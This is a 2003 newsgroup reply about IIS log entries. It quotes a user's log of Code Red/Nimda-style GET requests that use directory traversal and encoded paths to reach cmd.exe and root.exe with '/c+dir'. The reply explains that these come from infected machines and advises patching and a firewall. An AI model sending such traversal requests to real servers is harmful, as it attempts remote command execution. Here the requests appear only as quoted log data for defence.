Re: anybody seeing this in their logs?
From: Jonathan Maltz [MS-MVP] (jmaltz_at_mvps.org)
Date: 11/04/03
- Next message: Karl Levinson [x y] mvp: "Re: FTP and IIS HACK!!!"
- Previous message: anonymous_at_discussions.microsoft.com: "anybody seeing this in their logs?"
- In reply to: anonymous_at_discussions.microsoft.com: "anybody seeing this in their logs?"
- Next in thread: Karl Levinson [x y] mvp: "Re: anybody seeing this in their logs?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 3 Nov 2003 22:58:51 -0500
Prevent them? Not possible. Those are OTHER people with Code Red/Nimda
trying to attack your server. As long as you are up to date on security
patches and have a good firewall, I wouldn't worry
-- --Jonathan Maltz [Microsoft MVP - Windows Server] http://www.imbored.biz - A Windows Server 2003 visual, step-by-step tutorial site :-) Only reply by newsgroup. If I see an email I didn't ask for, it will be deleted without reading. <anonymous@discussions.microsoft.com> wrote in message news:000401c3a280$cb28ace0$a001280a@phx.gbl... What does this mean? /scripts/root.exe /c+dir /MSADC/root.exe /c+dir 403 /c/winnt/system32/cmd.exe /c+dir 404 /d/winnt/system32/cmd.exe /c+dir 404 /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - /_vti_bin/..%5c../..%5c../..% 5c../winnt/system32/cmd.exe /c+dir 500 - /_mem_bin/..%5c../..%5c../..% 5c../winnt/system32/cmd.exe /c+dir 404 - /msadc/..%5c../..%5c../..% 5c/..Á_../..Á_../..Á_../winnt/system32/cmd.exe /c+dir 403 - /scripts/..Á_../winnt/system32/cmd.exe /c+dir 500 - /scripts/winnt/system32/cmd.exe /c+dir 404 - winnt/system32/cmd.exe /c+dir 404 - /winnt/system32/cmd.exe /c+dir 404 - /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 - All are GET requests to my Small Business Server 2000 running Exchange and OWA. What can I do to prevent these? I tried them from home and I get an invalid query string or some such message. The IP's are coming from MN, MA, and TX. I am running and IDS so I have all the info if needed. The system is patched religiously and is as recent as any security holes Friday evening. Thanks for the help, Don
- Next message: Karl Levinson [x y] mvp: "Re: FTP and IIS HACK!!!"
- Previous message: anonymous_at_discussions.microsoft.com: "anybody seeing this in their logs?"
- In reply to: anonymous_at_discussions.microsoft.com: "anybody seeing this in their logs?"
- Next in thread: Karl Levinson [x y] mvp: "Re: anybody seeing this in their logs?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
